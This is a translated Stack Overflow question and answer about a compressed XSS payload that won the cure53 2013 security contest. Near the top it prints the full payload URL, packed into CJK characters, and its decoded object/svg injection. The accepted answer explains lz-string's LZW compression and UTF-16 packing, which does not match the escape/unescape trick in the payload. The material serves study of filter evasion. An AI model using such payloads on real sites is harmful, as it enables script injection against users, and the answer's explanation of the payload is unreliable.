javascript - 这种 javascript 压缩技术是如何工作的？

我正在检查涉及 XSS (link) 的安全竞赛的结果，发现了一些美妙而可怕的 JS XSS payloas。获胜者 (@kinugawamasato) 使用了一种 javascript 压缩技术，这对我来说似乎完全不同凡响:

压缩负载:

https://cure53.de/xmas2013/?xss=<scriPt>document.write(unescape(escape(location)
.replace(/u(..)/g,'$1%')))<\/scriPt>㱯扪散琠楤㵥⁣污獳楤㵣汳楤㨳㌳䌷䉃㐭㐶うⴱㅄ〭
䉃〴ⴰ〸ぃ㜰㔵䄸㌠潮牯睥湴敲㵡汥牴⠯繷⸪ℱ⼮數散⡲散潲摳整⠰⤩⤾㱳癧⁯湬潡搽攮摡瑡畲氽慬汛攮
牯睤敬業㴳㍝⬧㽳慮瑡㵀Ⅱ汬潷彤潭慩湳㴧⭤潭慩渻攮捨慲獥琽❵瑦ⴷ✾

到底发生了什么:

<object id=e classid=clsid:333C7BC4-460F-11D0-BC04-0080C7055A83 onrowenter=alert(/~w.*!1/.exec(recordset(0)))><svg onload=e.dataurl=all[e.rowdelim=33]+'?santa=@!allow_domains='+domain;e.charset='utf-7'>

这项技术是否已经在某处记录下来以便我可以研究它？这东西究竟是如何工作的？是否已经有一些 javascript 压缩器可以自动执行此操作？ WAF 将如何应对这样的负载？

你可以看到更多的例子here .

最佳答案

我正在使用 lz-string每当将任何数据放入 localStorage 时用于 JS 压缩的库。我只是这个库的用户——不是压缩专家。但这是可以在该工具周围找到的信息...

lz-string目标:

lz-string was designed to fulfill the need of storing large amounts of data in localStorage, specifically on mobile devices. localStorage being usually limited to 5MB, all you can compress is that much more data you can store.

... I (note: "I" means, Pieroxy, author of the lz-string) started out from an LZW implementation (no more patents on that), which is very simple...

所以，这个实现的基础是 LZW，这里提到了它 Javascript client-data compression通过 Andy E .让我指出

Wikipedia article on LZW 的链接
LZW compression example .

摘自 Wikipedia - Algorithm :

The scenario described by Welch's 1984 encodes sequences of 8-bit data as fixed-length 12-bit codes. The codes from 0 to 255 represent 1-character sequences consisting of the corresponding 8-bit character, and the codes 256 through 4095 are created in a dictionary for sequences encountered in the data as it is encoded. At each stage in compression, input bytes are gathered into a sequence until the next character would make a sequence for which there is no code yet in the dictionary. The code for the sequence (without that character) is added to the output, and a new code (for the sequence with that character) is added to the dictionary.

Wikipedia - Encoding :

A high level view of the encoding algorithm is shown here:

Initialize the dictionary to contain all strings of length one.

Find the longest string W in the dictionary that matches the current input.

Emit the dictionary index for W to output and remove W from the input.

Add W followed by the next symbol in the input to the dictionary.

Go to Step 2.

在我们可以观察到的 lz 字符串的情况下它是如何工作的:

源代码:lz-string-1.3.3.js

让我引用已经提到的 lz-string source 中的几个步骤:

What I did was:

localStorage can only contain JavaScript strings. Strings in JavaScript are stored internally in UTF-16, meaning every character weight 16 bits. I modified the implementation to work with a 16bit-wide token space.

I had to remove the default dictionary initialization, totally useless on a 16bit-wide token space.

I initialize the dictionary with three tokens:

An entry that produces a 16-bit token.

An entry that produces an 8-bit token, because most of what I will store is in the iso-latin-1 space, meaning tokens below 256.

An entry that mark the end of the stream.

The output is processed by a bit stream that stores effectively 16 bits per character in the output string.

Each token is stored with just as many bits that are needed according to the size of the dictionary. Hence, the first token takes 2 bits, the second to 7th three bits, etc....

好吧，现在我们知道，通过这些压缩技术，我们可以获得 16 位信息。我们可以在这个演示中测试它:http://pieroxy.net/blog/pages/lz-string/demo.html (或/和另一个 here)

它将:Hello, world. 转换为

85 04 36 30 f6 60 40 03 0e 04 01 e9 80 39 03 26
00 a2

所以我们需要最后一步，让我再次引用:

Well, this lib produces stuff that isn't really a string. By using all 16 bits of the UTF-16 bitspace, those strings aren't exactly valid UTF-16. By version 1.3.0, I added two helper encoders to produce stuff that we can do something with:

compress produces invalid UTF-16 strings. Those can be stored in localStorage only on webkit browsers (Tested on Android, Chrome, Safari). Can be decompressed with decompress

继续我们的示例，Hello, world. 将被转换为

҅〶惶̀Ў㦀☃ꈀ

最后就是这样。我们可以看到，所有 ...其他拉丁字符... 的集合来自最终转换为 UTF-16。希望，这会给出一些提示...

关于javascript - 这种 javascript 压缩技术是如何工作的？，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/23120115/

javascript - 这种 javascript 压缩技术是如何工作的？

上一篇：javascript - 如何搜索一长串 javascript 对象以找到 'sent: 0' 的第一个实例

下一篇：javascript - .remove() 之后的 d3 回调函数